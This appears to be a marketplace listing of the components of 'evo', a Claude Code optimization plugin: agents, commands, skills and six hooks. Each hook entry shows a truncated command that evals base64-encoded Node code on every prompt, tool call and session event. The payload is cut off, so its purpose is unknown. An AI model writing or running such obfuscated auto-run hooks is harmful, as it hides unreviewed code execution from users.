evo-hq

20 mods across 2 repositories, 1.4k stars between them.

evo-hq-evo

01

evo-hq/evo

Plugin Claude Code

Plugin marketplace listing 1 plugin: evo.

1.4k 1mo ago A tokens not measured original Apache-2.0

evo

02

evo-hq/evo

Plugin Claude Code

Structured experiment-driven code optimization using tree search and parallel subagents.

1.4k 1mo ago A tokens not measured original Apache-2.0

benchmark-reviewer

03

evo-hq/evo

Agent

Reviews an evo benchmark in two modes. mode=audit -- pre-flight harness audit before the first run (per-task instrumentation, leakage, gates, plumbing); read-only. mode=review-experiment -- post-commit per-task failure analysis for a specific experiment; reads per-task traces and the eval-runner log, writes per-task…

1.4k 1mo ago A 112 tokens original Apache-2.0

ideator

04

evo-hq/evo

Agent

Generates ranked experiment proposals for the evo orchestrator. Runs ONE brief per invocation (failureanalysis, literature, or frontierextrapolation) and appends proposals as JSONL lines to a shared file the orchestrator reconciles. Use literature for web/arXiv/HF/GitHub research (the only brief that needs network).…

1.4k 1mo ago A 142 tokens original Apache-2.0

verifier

05

evo-hq/evo

Agent

Read-only audit of one evo experiment for design-time cheating (pre-phase) or result-time validity (post-phase). Catches test-set leakage in training data, subsetted eval commands, missing gates for new artifacts, generic hypotheses, cache short-circuits, fake artifacts, and score-reproducibility failures. Returns…

1.4k 1mo ago A 146 tokens original Apache-2.0

discover

06

evo-hq/evo

Command

Discover what to optimize and initialize an evo workspace.

1.4k 1mo ago A 12 tokens original Apache-2.0

optimize

07

evo-hq/evo

Command

Run the evo autoresearch optimization loop.

1.4k 1mo ago A 11 tokens original Apache-2.0

PreToolUse

08

evo-hq/evo

Hook

Runs before the agent uses a tool, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc. From evo-hq/evo.

1.4k 1mo ago C tokens not measured original Apache-2.0

PostToolUse

09

evo-hq/evo

Hook

Runs after a tool call finishes for Bash tool calls, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc (2 commands). From evo-hq/evo.

1.4k 1mo ago C tokens not measured original Apache-2.0

UserPromptSubmit

10

evo-hq/evo

Hook

Runs when you submit a prompt, before the agent sees it, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc. From evo-hq/evo.

1.4k 1mo ago C tokens not measured copy · 86% Apache-2.0

SessionStart

11

evo-hq/evo

Hook

Runs when a session starts, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc. From evo-hq/evo.

1.4k 1mo ago C tokens not measured copy · 83% Apache-2.0

Stop

12

evo-hq/evo

Hook

Runs when the agent finishes a response, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc. From evo-hq/evo.

1.4k 1mo ago C tokens not measured copy · 88% Apache-2.0

SubagentStop

13

evo-hq/evo

Hook

Runs when a subagent finishes, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc. From evo-hq/evo.

1.4k 1mo ago C tokens not measured copy · 84% Apache-2.0

discover

14

evo-hq/evo

Skill Claude CodeCodex

Initialize evo for the current repository by exploring the codebase, proposing unexplored optimization dimensions, constructing the benchmark inside a baseline worktree, and running the first experiment. Use when the user invokes /evo:discover, mentions setting up evo, wants to instrument a codebase for autonomous…

1.4k 1mo ago A 73 tokens original Apache-2.0

infra-setup

15

evo-hq/evo

Skill Claude CodeCodex

Non-user-invocable provider/setup reference for evo backend switching, prerequisite checks, and auth/install guidance.

1.4k 1mo ago A 25 tokens original Apache-2.0

optimize

16

evo-hq/evo

Skill Claude CodeCodex

Drive structured autoresearch iteration after evo:discover and the baseline commit. Use when the user invokes /evo:optimize or asks to try ideas, try variants, run experiments, use available GPUs, improve the current best/frontier, continue an evo search, or compare candidate changes in an evo workspace. The…

1.4k 1mo ago A 113 tokens original Apache-2.0

report

17

evo-hq/evo

Skill Claude CodeCodex

Read-only evo run reporting. Use when the user invokes /evo:report, asks what happened overnight, asks what improved recently, asks for the best/frontier candidates, asks for a quick score chart without opening the dashboard, or wants the scatter plot in chat output. Never run benchmarks, gates, Slurm commands, evo…

1.4k 1mo ago A 80 tokens original Apache-2.0

ship

18

evo-hq/evo

Skill Claude CodeCodex

Land the winning experiment from an evo run as a clean, mergeable change -- open a PR when the repo has a remote, otherwise merge into the working branch. Distills the best-scoring experiment down to the minimal diff that reproduces its behaviour, shaped for the qualities a maintainer merges on (scope discipline, test…

1.4k 1mo ago A 114 tokens original Apache-2.0

subagent

19

evo-hq/evo

Skill Claude CodeCodex

Protocol that evo optimization subagents follow when dispatched from /optimize. Auto-loaded by spawned subagents via their host's skill loader. The orchestrator may also invoke this skill to understand the brief shape its dispatched subagents expect + what they're required to emit -- useful when writing briefs or…

1.4k 1mo ago B 67 tokens original Apache-2.0

finetuning

20

evo-hq/evo

Skill Claude CodeCodex

This skill should be used when picking or diagnosing a training move (SFT, LoRA, DPO/KTO/ORPO, RFT, GRPO/PPO/RLOO, RLHF), or when the user mentions fine-tuning, post-training, training recipe, reward design, or weight updates. Decision tree by reward shape, smoke-run gate, three failure diagnostics, five…

1.4k 1mo ago A 95 tokens original Apache-2.0